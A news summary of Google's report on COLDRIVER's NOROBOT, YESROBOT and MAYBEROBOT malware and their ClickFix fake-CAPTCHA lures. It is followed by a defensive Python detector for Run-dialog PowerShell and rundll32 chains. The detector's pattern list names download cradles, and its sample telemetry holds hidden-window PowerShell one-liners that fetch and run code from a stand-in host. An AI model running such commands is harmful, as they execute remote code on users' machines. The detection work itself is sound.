Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers
Briefly
"The findings come from Google Threat Intelligence Group (GTIG), which said the state-sponsored hacking crew has rapidly refined and retooled its malware arsenal merely five days following the publication of its LOSTKEYS malware around the same time. While it's currently not known for how long the new malware families have been under development, the tech giant's threat intelligence team said it has not observed a single instance of LOSTKEYS since disclosure."
"The latest attack waves are something of a departure from COLDRIVER's typical modus operandi, which involves targeting high profile individuals in NGOs, policy advisors, and dissidents for credential theft. In contrast, the new activity revolved around leveraging ClickFix-style lures to trick users into running malicious PowerShell commands via the Windows Run dialog as part of a fake CAPTCHA verification prompt."
Google Threat Intelligence Group (GTIG) has observed rapid development of multiple malware families attributed to the Russia-linked actor COLDRIVER since May 2025, pointing to an increased operational tempo. The new families, codenamed NOROBOT, YESROBOT and MAYBEROBOT, are components of a single related delivery chain. Earlier activity used LOSTKEYS, but GTIG has not observed a single instance of LOSTKEYS since its disclosure. The new waves depart from COLDRIVER's usual credential-theft operations against high-profile individuals in NGOs, policy advisors and dissidents: instead they use ClickFix-style HTML lures that coax users into running malicious PowerShell commands via the Windows Run dialog as part of a fake CAPTCHA verification prompt. The COLDCOPY lure drops a NOROBOT DLL, executed with rundll32.exe, that installs the subsequent payloads. Zscaler tracks NOROBOT and MAYBEROBOT as BAITSWITCH and SIMPLEFIX, respectively.
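The execution chain described above (a script host launched from the Run dialog, then rundll32.exe loading a dropped DLL) leaves telemetry a defender can match on. The following is an added example written for this summary, not code from The Hacker News, GTIG or Zscaler: a heuristic detector in Python over Sysmon-style process-creation events, plus a check of the RunMRU registry values that record Run-dialog history. It goes slightly beyond the article by covering the RunMRU artifact as well as the process tree. Every event, path, hostname (`example.invalid`), DLL name (`loader.dll`) and RunMRU entry below is constructed for illustration; the only facts assumed from Windows itself are that Run-dialog children are parented by explorer.exe and that RunMRU stores each history entry as a value named `a`, `b`, `c` ... whose data ends in `\1`, ordered by `MRUList`.

```python
# Added example (not from the article, GTIG or Zscaler): heuristic detection
# for a ClickFix-style chain -- script host spawned from the Run dialog, then
# rundll32.exe loading a DLL from a user-writable path -- over constructed
# Sysmon-style process-creation events and constructed RunMRU contents.
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

RUN_DIALOG_PARENT = "explorer.exe"     # Win+R children are parented by explorer.exe
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Tokens common in pasted ClickFix one-liners: hidden window, encoded command,
# execution-policy bypass, download-and-execute cradles, DLL/HTA loaders.
SUSPICIOUS = re.compile(
    r"(?i)(?:-e(?:c|nc|ncodedcommand)?\s|-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b"
    r"|-ep\s+bypass|executionpolicy\s+bypass|\biex\b|invoke-expression|\birm\b|\biwr\b"
    r"|downloadstring|rundll32|mshta)"
)
# Paths an unprivileged user can write to (where a dropped DLL would live).
USER_WRITABLE = re.compile(
    r"(?i)\\(?:users\\[^\\]+\\(?:appdata|downloads|desktop|documents)|programdata|windows\\temp)\\"
)


@dataclass
class ProcEvent:
    pid: int
    image: str
    parent_image: str
    command_line: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def flag_event(ev: ProcEvent) -> List[str]:
    """Return the reasons this event looks like part of a ClickFix chain
    (empty list when nothing matched)."""
    reasons: List[str] = []
    image, parent = _basename(ev.image), _basename(ev.parent_image)
    # Stage 1: a script host launched from the Run dialog with a suspicious token.
    if parent == RUN_DIALOG_PARENT and image in SCRIPT_HOSTS:
        m = SUSPICIOUS.search(ev.command_line)
        if m:
            reasons.append(f"{image} spawned by explorer.exe (Run dialog) "
                           f"with token '{m.group(0).strip()}'")
    # Stage 2: rundll32.exe, spawned by a script host, loading a DLL from a user path.
    if image == "rundll32.exe" and parent in SCRIPT_HOSTS:
        if USER_WRITABLE.search(ev.command_line):
            reasons.append(f"rundll32.exe spawned by {parent} loading a DLL "
                           f"from a user-writable path")
    return reasons


def scan_events(events: List[ProcEvent]) -> List[Tuple[int, List[str]]]:
    """Run flag_event over a batch; returns (pid, reasons) for each hit."""
    hits = []
    for ev in events:
        reasons = flag_event(ev)
        if reasons:
            hits.append((ev.pid, reasons))
    return hits


def scan_runmru(values: Dict[str, str]) -> List[Tuple[str, str]]:
    # HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU keeps
    # Run-dialog history as values a, b, c ... whose data ends in "\1";
    # MRUList records their recency order. Returns (name, command) per hit.
    hits = []
    for name, data in values.items():
        if name == "MRUList":
            continue
        cmd = data[:-2] if data.endswith("\\1") else data
        if SUSPICIOUS.search(cmd):
            hits.append((name, cmd))
    return hits


# Constructed sample telemetry (Sysmon-style process creation, event ID 1).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(4120, r"C:\Windows\explorer.exe", r"C:\Windows\System32\userinit.exe", "explorer.exe"),
    ProcEvent(5288, PS, r"C:\Windows\explorer.exe",
              'powershell -w hidden -c "iwr http://example.invalid/r | iex"'),   # pasted ClickFix line
    ProcEvent(5302, r"C:\Windows\System32\rundll32.exe", PS,
              r"rundll32.exe C:\Users\alice\AppData\Local\Temp\loader.dll,Entry"),  # hypothetical DLL
    ProcEvent(5410, PS, r"C:\Windows\explorer.exe",
              "powershell.exe -NoExit -Command Get-Process"),                    # benign admin use
]

# Constructed RunMRU contents; per MRUList, "b" is the most recent entry.
SAMPLE_RUNMRU = {"MRUList": "ba", "a": "notepad\\1",
                 "b": "powershell -w hidden -c iex (irm http://example.invalid/r)\\1"}

if __name__ == "__main__":
    for pid, reasons in scan_events(SAMPLE_EVENTS):
        print(pid, *reasons, sep="\n  ")
    for name, cmd in scan_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU {name}: {cmd}")
```

The two stages are deliberately independent: an explorer.exe to powershell.exe spawn with a hidden-window or download-cradle token is the earliest signal, while the rundll32.exe child loading from a user-writable path confirms the handoff to the DLL stage; the RunMRU check catches cases where process telemetry was missing but the pasted command survived on disk. The token list is a starting point for tuning, not a complete signature.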
Read at The Hacker News